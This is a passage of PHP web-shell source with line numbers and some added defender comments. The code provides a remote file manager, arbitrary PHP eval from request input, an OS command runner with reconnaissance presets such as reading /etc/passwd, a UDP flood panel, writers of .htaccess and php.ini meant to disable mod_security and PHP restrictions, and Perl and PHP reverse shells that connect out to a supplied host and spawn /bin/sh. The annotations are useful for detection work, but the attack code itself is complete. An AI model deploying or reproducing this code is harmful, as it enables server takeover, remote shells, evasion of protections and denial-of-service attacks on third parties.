 671        if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
 672            $files[] = array_merge($tmp, array('type' => 'file'));
 673        elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
 674            $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
 675        elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != "."))
 676            $dirs[] = array_merge($tmp, array('type' => 'dir'));
 677    }
         // Comparator for usort(): case-insensitive string compare on the chosen column, or a
         // numeric compare for size, reversed when the direction flag is 0. The wsoCmp name is
         // one more fixed string usable as a signature.
 678    $GLOBALS['sort'] = $sort;
 679    function wsoCmp($a, $b) {
 680        if($GLOBALS['sort'][0] != 'size')
 681            return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
 682        else
 683            return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
 684    }
 685    usort($files, "wsoCmp");
 686    usort($dirs, "wsoCmp");
 687    $files = array_merge($dirs, $files);
 688    $l = 0;
         // One table row per entry, directories first. The links call g() with the FilesTools
         // sub-actions view, chmod, rename, touch, edit and download, or with FilesMan delete.
 689    foreach($files as $f) {
 690        echo '<tr'.($l?' class=l1':'').'><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td><td>'.(($f['type']=='file')?madSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
 691            .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'<a href="#" onclick="g(\'FilesMan\',null,\'delete\', \''.urlencode($f['name']).'\')"> X </a></td></tr>';
 692        $l = $l?0:1;
 693    }
 694    echo "<tr><td colspan=7>
 695   <input type=hidden name=a value='FilesMan'>
 696   <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
 697   <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
 698   </form></table></div>";
 699 
 700    
 701     madfooter();
 702  }
 703     
 704   function madFilesTools() {
 705    if( isset($_POST['p1']) )
 706        $_POST['p1'] = urldecode($_POST['p1']);
 707    if(@$_POST['p2']=='download') {
 708        if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
 709            ob_start("ob_gzhandler", 4096);
 710            header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
 711            if (function_exists("mime_content_type")) {
 712                $type = @mime_content_type($_POST['p1']);
 713                header("Content-Type: " . $type);
 714            } else
 715                 header("Content-Type: application/octet-stream");
 716            $fp = @fopen($_POST['p1'], "r");
 717            if($fp) {
 718                while(!@feof($fp))
 719                    echo @fread($fp, 1024);
 720                fclose($fp);
 721            }
 722        }exit;
 723    }
 724    if( @$_POST['p2'] == 'mkfile' ) {
 725        if(!file_exists($_POST['p1'])) {
 726            $fp = @fopen($_POST['p1'], 'w');
 727            if($fp) {
 728                $_POST['p2'] = "edit";
 729                fclose($fp);
 730            }
 731        }
 732    }
 733    
 734    madhead();
 735    echo '<div class=header>';
 736    if( !file_exists(@$_POST['p1']) ) {
 737        echo "<pre class=ml1 style='margin-top:5px'>FILE DOEST NOT EXITS </pre></div>";
 738        madFooter();
 739        return;
 740    }
 741    $uid = @posix_getpwuid(@fileowner($_POST['p1']));
 742    if(!$uid) {
 743        $uid['name'] = @fileowner($_POST['p1']);
 744        $gid['name'] = @filegroup($_POST['p1']);
 745    } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
 746    echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?madSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.madPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
 747    echo '<br>';
 748    if( empty($_POST['p2']) )
 749        $_POST['p2'] = 'view';
 750    if( is_file($_POST['p1']) )
 751        $m = array('View', 'Highlight', 'Download', 'Edit', 'Chmod', 'Rename', 'Touch');
 752    else
 753        $m = array('Chmod', 'Rename', 'Touch');
 754    foreach($m as $v)
 755        echo '<a  href=# onclick="g(null,null,null,\''.strtolower($v).'\')"><span>'.((strtolower($v)==@$_POST['p2'])?'<b><span> '.$v.' </span> </b>':$v).' </span></a> ';
 756    echo '<br><br>';
 757    switch($_POST['p2']) {
 758        case 'view':
 759            echo '<pre class=ml1>';
 760            $fp = @fopen($_POST['p1'], 'r');
 761            if($fp) {
 762                while( !@feof($fp) )
 763                    echo htmlspecialchars(@fread($fp, 1024));
 764                @fclose($fp);
 765            }
 766            echo '</pre>';
 767            break;
 768        case 'highlight':
 769            if( @is_readable($_POST['p1']) ) {
 770                echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
 771                $code = @highlight_file($_POST['p1'],true);
 772                echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
 773            }
 774            break;
 775        case 'chmod':
 776            if( !empty($_POST['p3']) ) {
 777                $perms = 0;
 778                for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
 779                    $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
 780                if(!@chmod($_POST['p1'], $perms))
 781                    echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
 782            }
 783            clearstatcache();
 784            echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
 785            break;
 786        case 'edit':
 787            if( !is_writable($_POST['p1'])) {
 788                echo 'File isn\'t writeable';
 789                break;
 790            }
 791            if( !empty($_POST['p3']) ) {
 792                $time = @filemtime($_POST['p1']);
 793                $_POST['p3'] = substr($_POST['p3'],1);
 794                $fp = @fopen($_POST['p1'],"w");
 795                if($fp) {
 796                    @fwrite($fp,$_POST['p3']);
 797                    @fclose($fp);
 798                    echo 'Saved!<br><script>p3_="";</script>';
 799                    @touch($_POST['p1'],$time,$time);
 800                }
 801            }
 802            echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
 803            $fp = @fopen($_POST['p1'], 'r');
 804            if($fp) {
 805                while( !@feof($fp) )
 806                    echo htmlspecialchars(@fread($fp, 1024));
 807                @fclose($fp);
 808            }
 809            echo '</textarea><input type=submit value=">>"></form>';
 810            break;
 811        case 'hexdump':
 812            $c = @file_get_contents($_POST['p1']);
 813            $n = 0;
 814            $h = array('00000000<br>','','');
 815            $len = strlen($c);
 816            for ($i=0; $i<$len; ++$i) {
 817                $h[1] .= sprintf('%02X',ord($c[$i])).' ';
 818                switch ( ord($c[$i]) ) {
 819                    case 0:  $h[2] .= ' '; break;
 820                    case 9:  $h[2] .= ' '; break;
 821                    case 10: $h[2] .= ' '; break;
 822                    case 13: $h[2] .= ' '; break;
 823                    default: $h[2] .= $c[$i]; break;
 824                }
 825                $n++;
 826                if ($n == 32) {
 827                    $n = 0;
 828                    if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
 829                    $h[1] .= '<br>';
 830                    $h[2] .= "\n";
 831                }
 832            }
 833            echo '<table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
 834            break;
 835        case 'rename':
 836            if( !empty($_POST['p3']) ) {
 837                if(!@rename($_POST['p1'], $_POST['p3']))
 838                    echo 'Can\'t rename!<br>';
 839                else
 840                    die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
 841            }
 842            echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
 843            break;
 844        case 'touch':
 845            if( !empty($_POST['p3']) ) {
 846                $time = strtotime($_POST['p3']);
 847                if($time) {
 848                    if(!touch($_POST['p1'],$time,$time))
 849                        echo 'Fail!';
 850                    else
 851                        echo 'Touched!';
 852                } else echo 'Bad time format!';
 853            }
 854            clearstatcache();
 855            echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
 856            break;
 857    }
 858    echo '</div>';
 859    madFooter();
 860 }  
 861 
 862 function madphpeval()
 863 {
     // Panel handler that shows PHP runtime information and evaluates PHP code
     // taken from the request. Reads $_POST['p1'] (code to run), $_POST['p2']
     // (view selector: 'ini', 'info' or 'exten') and $_POST['ajax'].
     // Defender note: anyone who can reach this handler gets code execution with
     // the privileges of the PHP process. The file header turns PHP error logging
     // off, so file-integrity monitoring of the web root and process/egress
     // telemetry are more reliable signals than PHP's own logs.
 864     madhead();
 865     
     // View 'ini': dumps every ini directive (global value, local value, access
     // level) from ini_get_all() into an HTML table. Values are printed unescaped.
 866     if(isset($_POST['p2']) && ($_POST['p2'] == 'ini')) {
 867        echo '<div class=header>';
 868        ob_start();
 869        $INI=ini_get_all(); 
 870 print '<table border=0><tr>'
 871    .'<td class="listing"><font class="highlight_txt">Param</td>'
 872    .'<td class="listing"><font class="highlight_txt">Global value</td>'
 873    .'<td class="listing"><font class="highlight_txt">Local Value</td>'
 874    .'<td class="listing"><font class="highlight_txt">Access</td></tr>';
 875 foreach ($INI as $param => $values) 
 876    print "\n".'<tr>'
 877        .'<td class="listing"><b>'.$param.'</td>'
 878        .'<td class="listing">'.$values['global_value'].' </td>'
 879        .'<td class="listing">'.$values['local_value'].' </td>'
 880        .'<td class="listing">'.$values['access'].' </td></tr>';
 881        $tmp = ob_get_clean();
 882         $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
 883        $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
 884        echo str_replace('<h1','<h2', $tmp) .'</div><br>';
 885    }
 886     
     // View 'info': captures phpinfo() output, strips/rewrites its CSS rules with
     // the two preg_replace() calls and embeds the result in the panel.
 887     if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
 888        echo '<div class=header><style>.p {color:#000;}</style>';
 889        ob_start();
 890        phpinfo();
 891        $tmp = ob_get_clean();
 892         $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
 893        $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
 894        echo str_replace('<h1','<h2', $tmp) .'</div><br>';
 895    }
 896     
     // View 'exten': lists get_loaded_extensions(). NOTE(review): the ob_start()
     // in this branch has no matching ob_get_clean()/ob_end_* inside the branch.
 897     if(isset($_POST['p2']) && ($_POST['p2'] == 'exten')) {
 898        echo '<div class=header>';
 899        ob_start();
 900         $EXT=get_loaded_extensions ();
 901      print '<table border=0><tr><td class="listing">'
 902    .implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT)
 903    .'</td></tr></table>'
 904    .count($EXT).' extensions loaded';
 905        
 906         
 907         echo '</div><br>';
 908    }
 909     
 910     
     // Records in the session (key: md5 of the Host header + 'ajax') that this
     // request was a plain form post rather than an AJAX call.
 911    if(empty($_POST['ajax']) && !empty($_POST['p1']))
 912        $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
 913     echo '<div class=header><Center><a href=# onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=# onclick="g(\'phpeval\',null,\'\',\'info\')">    | phpinfo |</a><a href=# onclick="g(\'phpeval\',null,\'\',\'exten\')">   | extensions  |</a></center><br><form name=pf method=post onsubmit="g(\'phpeval\',null,this.code.value,\'\'); return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><center><input type=submit value=Eval style="margin-top:5px"></center>';
 914    echo '</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
     // Arbitrary code execution: $_POST['p1'] is handed to eval() unmodified; only
     // the captured output is HTML-escaped. eval is a language construct, so the
     // disable_functions ini directive does not block it.
 915    if(!empty($_POST['p1'])) {
 916        ob_start();
 917        eval($_POST['p1']);
 918        echo htmlspecialchars(ob_get_clean());
 919    }
 920    echo '</pre></div>';
 921   
 922     madfooter();
 923 }
 924 
 925 function madhash()
 926 {
     // String-tools panel: applies one encoding/hash function chosen from a fixed
     // list to request text. Reads $_POST['p1'] (function name), $_POST['p2']
     // (input text) and $_POST['ajax'].
     // The five conditional definitions below add global helper functions when
     // they do not already exist. The hex2bin() fallback returns a string of
     // binary digits (decbin(hexdec())), which is not what the native hex2bin()
     // returns. binhex(), hex2ascii() and ascii2hex() are defined but are not
     // listed in $stringTools.
 927     if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
 928     if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
 929    if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
 930    if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
 931    if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
     // Label => callable name. The values double as the allow-list for the
     // variable-function call further down.
 932    $stringTools = array(
 933        'Base64 encode' => 'base64_encode',
 934        'Base64 decode' => 'base64_decode',
 935         'md5 hash' => 'md5',
 936        'sha1 hash' => 'sha1',
 937        'crypt' => 'crypt',
 938        'CRC32' => 'crc32',
 939        'Url encode' => 'urlencode',
 940        'Url decode' => 'urldecode',
 941        'Full urlencode' => 'full_urlencode',
 942        'Htmlspecialchars' => 'htmlspecialchars',
 943        
 944    );
 945    
 946    madhead();
 947    echo '<div class=header>';
 948    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
 949        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
 950    echo "<form  onSubmit='g(null,null,this.selectTool.value,this.input.value); return false;'><select name='selectTool'>";
 951    foreach($stringTools as $k => $v)
 952        echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
 953        echo "</select><input type='submit' value='>>'/><br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
     // The request-supplied name is called as a function only when in_array()
     // finds it among the $stringTools values (loose comparison, no strict flag);
     // the result is HTML-escaped before output. The <pre> opened above is not
     // closed before the closing </div>.
 954    if(!empty($_POST['p1'])) {
 955        if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
 956    }
 957    echo "</div>";
 958    madFooter();
 959     
 960 }
 961 function maddos()
 962 {
     // UDP flood panel. Reads $_POST['p1'] (target host), $_POST['p2'] (duration
     // in seconds), $_POST['p3'] (UDP port) and $_POST['ajax']; none of the three
     // values is validated before use.
     // Defender note: a compromised web server running this shows up as sustained
     // outbound UDP with large fixed-content payloads from the PHP/web-server
     // process to a single destination. Egress filtering for the web tier (web
     // servers seldom need arbitrary outbound UDP) contains it; flow or firewall
     // logs are where it is visible, since PHP error logging is disabled in the
     // file header.
 963     madhead();
 964     echo '<div class=header>';
 965   if(empty($_POST['ajax'])&&!empty($_POST['p1']))
 966   $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
 967   echo '<center><span>| UDP DOSSIER |</span><br><br><form onSubmit="g(null,null,this.udphost.value,this.udptime.value,this.udpport.value); return false;" method=POST><span>Host :</span><input name="udphost" type="text"  size="25" /><span>Time :</span><input name="udptime" type="text" size="15" /><span>Port :</span><input name="udpport" type="text" size="10" /><input  type="submit" value=">>" /></form></center>';
 968   echo "<pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' >";
 969     if(!empty($_POST['p1']) && !empty($_POST['p2']) && !empty($_POST['p3']))
 970     {
 971          $packets=0;
         // Keeps the script running after the HTTP client disconnects, so the
         // loop below is bounded only by $max_time (the file header also removes
         // the execution time limit).
 972         ignore_user_abort(true);
 973         $exec_time=$_POST['p2'];
 974         $time=time();
 975         $max_time=$exec_time+$time;
 976         $host=$_POST['p1'];
 977         $portudp=$_POST['p3'];
         // Builds a 65000-byte payload of 'X'. $out is not initialised before the
         // first append; the resulting notice is masked by the header's
         // error_reporting(E_ALL ^ E_NOTICE).
 978         for($i=0;$i<65000;$i++)
 979         {
 980             $out .= 'X';
 981         }
         // Until $max_time: open a UDP socket to the target, write the payload,
         // close. $packets counts loop iterations, including ones where
         // fsockopen() failed.
 982         while(1){
 983     
 984          $packets++;
 985             if(time() > $max_time){
 986                     break;
 987             }
 988             
 989             $fp = fsockopen('udp://'.$host, $portudp, $errno, $errstr, 5);
 990             if($fp){
 991                     fwrite($fp, $out);
 992                     fclose($fp);
 993             }
 994             }
 995          echo "$packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second";
 996          echo "</pre>";
 997     }
 998     
 999     echo '</div>'; 
1000    
1001     madfooter();        
1002 }
1003 
1004 function madproc()
1005 {
     // Host-reconnaissance panel: prints a menu of preset OS commands and runs
     // whatever command string arrives in $_POST['p1'] through madEx() (defined
     // at the top of the file; it tries exec, passthru, system, shell_exec and
     // popen in turn). The menu is only a convenience: p1 is not checked against
     // $process, so any command is executed.
     // Defender note: look for the web-server/PHP worker spawning children such
     // as the commands listed below (ps, netstat, net user, systeminfo, reads of
     // /etc/passwd). Denying the exec-family functions via disable_functions and
     // alerting on shells spawned by the web server are the usual mitigations.
1006     madhead();
1007     echo "<Div class=header><center>";
1008     if(empty($_POST['ajax'])&&!empty($_POST['p1']))
1009   $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
     // $GLOBALS['sys'] is set to 'win' or 'unix' at the top of the file from
     // PHP_OS and selects which preset list is shown.
1010   if($GLOBALS['sys']=="win")
1011   {
1012     $process=array(
1013     "System Info" =>"systeminfo",
1014     "Active Connections" => "netstat -an",
1015    "Running Services" => "net start",
1016    "User Accounts" => "net user",
1017    "Show Computers" => "net view",
1018     "ARP Table" => "arp -a",
1019     "IP Configuration" => "ipconfig /all"
1020     );
1021     }
1022   else
1023   { 
1024     $process=array(
1025     "Process status" => "ps aux",
1026     "Syslog" =>"cat  /etc/syslog.conf",
1027     "Resolv" => "cat  /etc/resolv.conf",
1028     "Hosts" =>"cat /etc/hosts",
1029     "Passwd" =>"cat /etc/passwd",
1030     "Cpuinfo"=>"cat /proc/cpuinfo",
1031     "Version"=>"cat /proc/version",
1032     "Sbin"=>"ls -al /usr/sbin",
1033     "Interrupts"=>"cat /proc/interrupts",
1034     "lsattr"=>"lsattr -va",
1035     "Uptime"=>"uptime",
1036     "Fstab" =>"cat /etc/fstab",
1037     "HDD Space" => "df -h"
1038     );}
1039     
     // Each preset becomes a link whose onclick submits the command string as p1.
1040     foreach($process as $n => $link)
1041     {
1042         echo '<a href="#" onclick="g(null,null,\''.$link.'\')"> | '.$n.' | </a>';
1043     }
1044     echo "</center>"; 
     // Command output is echoed into the page without HTML escaping.
1045      if(!empty($_POST['p1']))
1046      {
1047         echo "<pre class='ml1' style='margin-top:5px' >";
1048         echo madEx($_POST['p1']);
1049         echo '</pre>';
1050      }
1051      echo "</div>";
1052      madfooter();
1053      }
1054      
1055 function madsafe()
1056 {
     // Writes configuration-override files into the current working directory
     // ($GLOBALS['cwd'], set at the top of the file) in an attempt to weaken the
     // host's protections. Any non-empty $_POST['p1'], ['p2'] or ['p3'] triggers
     // the corresponding write; the values themselves are not used.
     // Defender note: unexpected creation or modification of .htaccess or php.ini
     // inside web directories is the indicator. Restricting what .htaccess may
     // override (Apache AllowOverride) keeps these files from taking effect;
     // whether a per-directory php.ini is honoured depends on the SAPI and
     // hosting configuration.
1057     madhead();
1058     echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh  ] files create in following dir<br>| ".$GLOBALS['cwd']." |<br>";
1059     echo '<a href=# onclick="g(null,null,\'php.ini\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\'ini\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\'sh\')">| .htaccess(perl) | </a></center>';
     // p2: overwrites .htaccess with an <IfModule mod_security.c> block that
     // switches two directives to Off. NOTE(review): the directive names appear
     // partly masked ("Sec------") in this listing, presumably by the hosting
     // page; as printed they are not valid directives.
1060     if(!empty($_POST['p2']) && isset($_POST['p2']))
1061     {
1062     $fil=fopen($GLOBALS['cwd'].".htaccess","w");
1063     fwrite($fil,'<IfModule mod_security.c>
1064 Sec------Engine Off
1065 Sec------ScanPOST Off
1066 </IfModule>');
1067     fclose($fil);
1068    }
     // p1: overwrites php.ini in the working directory with settings meant to
     // turn safe_mode off and clear disable_functions.
1069    if(!empty($_POST['p1'])&& isset($_POST['p1']))
1070    {
1071     $fil=fopen($GLOBALS['cwd']."php.ini","w");
1072       fwrite($fil,'safe_mode=OFF
1073 disable_functions=NONE');
1074      fclose($fil);
1075     }
     // p3: overwrites .htaccess (the same file as the p2 branch, opened with "w")
     // with directives enabling ExecCGI and mapping .sh/.pl to CGI handling. The
     // AddHandler line is written twice.
1076     if(!empty($_POST['p3']) && isset($_POST['p3']))
1077     {
1078     $fil=fopen($GLOBALS['cwd'].".htaccess","w");
1079     fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI
1080 AddType application/x-httpd-cgi .sh
1081 AddHandler cgi-script .pl
1082 AddHandler cgi-script .pl');
1083      fclose($fil); 
1084     }
1085     echo "<br></div>";
1086     madfooter();
1087     
1088 }
1089 
1090 function madconnect()
1091 {
     // Reverse-shell ("back connect") panel with a Perl and a PHP variant. Reads
     // $_POST['p1'] (variant: 'bcp' or 'php'), $_POST['p2'] (remote IP) and
     // $_POST['p3'] (remote port); the form pre-fills the IP with the requester's
     // REMOTE_ADDR and the port with 443.
     // Defender note: indicators are an outbound TCP connection from the web
     // server to an arbitrary host, a short-lived /tmp/bc.pl, and perl or
     // /bin/sh -i running as a child of the web-server/PHP process. Default-deny
     // egress from the web tier and denying proc_open/fsockopen and the
     // exec-family functions in PHP are the usual mitigations.
1092  madhead();
     // Base64-encoded Perl script; cf() below decodes it to disk before it is run.
1093  $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1094  echo "<div class=header><center><h3><span>| PERL AND PHP(threads) BACK CONNECT |</span></h3>";
1095  echo "<form  onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\"><span>PERL BACK CONNECT</span><br>IP: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='443'> <input type=submit value='>>'></form>";
1096  echo "<br><form  onSubmit=\"g(null,null,'php',this.server.value,this.port.value);return false;\"><span>PHP BACK CONNECT</span><br>IP: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='443'> <input type=submit value='>>'></form></center>";
1097  if(isset($_POST['p1'])) {
        // cf($f, $t): writes base64_decode($t) to path $f. Declared inside the
        // if-block, so it only exists once this branch has run.
1098        function cf($f,$t) {
1099            $w = @fopen($f,"w") or @function_exists('file_put_contents');
1100            if($w){
1101                @fwrite($w,@base64_decode($t));
1102                @fclose($w);
1103            }
1104        }
        // Perl variant: drops the script at /tmp/bc.pl, starts it in the
        // background through madEx() with p2/p3 appended to the command line
        // unescaped, then deletes the file. The "Successfully opened" message is
        // printed unconditionally, and p2/p3 are echoed without HTML escaping.
1105        if($_POST['p1'] == 'bcp') {
1106            cf("/tmp/bc.pl",$back_connect_p);
1107            $out = madEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
1108            echo "<pre class=ml1 style='margin-top:5px'>Successfully opened reverse shell to ".$_POST['p2'].":".$_POST['p3']."<br>Connecting...</pre>";
1109             @unlink("/tmp/bc.pl");
1110        }
        // PHP variant: connects out with fsockopen(), starts the $shell command
        // line with proc_open() and relays bytes between the socket and the
        // process pipes until either side closes.
1111         if($_POST['p1']=='php')
1112  {
1113             
1114 @set_time_limit (0);
1115 $ip = $_POST['p2']; 
1116 $port =$_POST['p3'];     
1117 $chunk_size = 1400;
1118 $write_a = null;
1119 $error_a = null;
1120 $shell = 'uname -a; w; id; /bin/sh -i';
1121 $daemon = 0;
1122 $debug = 0;
1123 echo "<pre class=ml1 style='margin-top:5px'>";
1124 
     // Where the pcntl extension is available: fork, let the parent exit and make
     // the child a session leader so it is detached from the web request.
1125 if (function_exists('pcntl_fork')) {
1126    
1127    $pid = pcntl_fork();
1128    
1129    if ($pid == -1) {
1130        echo "Cant fork!<br>";
1131        exit(1);
1132    }
1133    
1134    if ($pid) {
1135        exit(0);  
1136    }
1137 
1138    if (posix_setsid() == -1) {
1139        echo "Error: Can't setsid()<br>";
1140        exit(1);
1141    }
1142 
1143    $daemon = 1;
1144 } else {
1145    echo "WARNING: Failed to daemonise.  This is quite common and not fatal<br>";
1146 }
1147 
1148 chdir("/");
1149 
1150 umask(0);
1151 
     // Outbound TCP connection to the request-supplied host and port (30 s timeout).
1152 $sock = fsockopen($ip, $port, $errno, $errstr, 30);
1153 if (!$sock) {
1154    echo "$errstr ($errno)";
1155    exit(1);
1156 }
1157 
1158 
1159 $descriptorspec = array(
1160    0 => array("pipe", "r"),  
1161    1 => array("pipe", "w"),  
1162    2 => array("pipe", "w")   
1163 );
1164 
1165 $process = proc_open($shell, $descriptorspec, $pipes);
1166 
1167 if (!is_resource($process)) {
1168    echo "ERROR: Can't spawn shell<br>";
1169    exit(1);
1170 }
1171 
1172 
1173 @stream_set_blocking($pipes[0], 0);
1174 @stream_set_blocking($pipes[1], 0);
1175 @stream_set_blocking($pipes[2], 0);
1176 @stream_set_blocking($sock, 0);
1177 
1178 echo "Successfully opened reverse shell to $ip:$port<br>";
1179 
     // Relay loop: socket -> process stdin, process stdout/stderr -> socket, in
     // chunks of up to $chunk_size bytes; stream_select() blocks with no timeout.
1180 while (1) {
1181    if (feof($sock)) {
1182        echo "ERROR: Shell connection terminated<br>";
1183        break;
1184    }
1185 
1186    if (feof($pipes[1])) {
1187        echo "ERROR: Shell process terminated<br>";
1188        break;
1189    }
1190 
1191    
1192    $read_a = array($sock, $pipes[1], $pipes[2]);
1193    $num_changed_sockets=@stream_select($read_a, $write_a, $error_a, null);
1194 
1195    if (in_array($sock, $read_a)) {
1196        if ($debug) echo "SOCK READ<br>";
1197        $input=fread($sock, $chunk_size);
1198        if ($debug) echo "SOCK: $input<br>";
1199        fwrite($pipes[0], $input);
1200    }
1201 
1202    if (in_array($pipes[1], $read_a)) {
1203        if ($debug) echo "STDOUT READ<br>";
1204        $input = fread($pipes[1], $chunk_size);
1205        if ($debug) echo "STDOUT: $input<br>";
1206        fwrite($sock, $input);
1207    }
1208 
1209    
1210    if (in_array($pipes[2], $read_a)) {
1211        if ($debug) echo "STDERR READ<br>";
1212        $input = fread($pipes[2], $chunk_size);
1213        if ($debug) echo "STDERR: $input<br>";
1214        fwrite($sock, $input);
1215    }
1216 }
1217 
1218 fclose($sock);
1219 fclose($pipes[0]);
1220 fclose($pipes[1]);
1221 fclose($pipes[2]);
1222 proc_close($process);
1223 
1224 echo "</pre>";
1225 }
1226 
1227 }   
1228  echo "</div>";
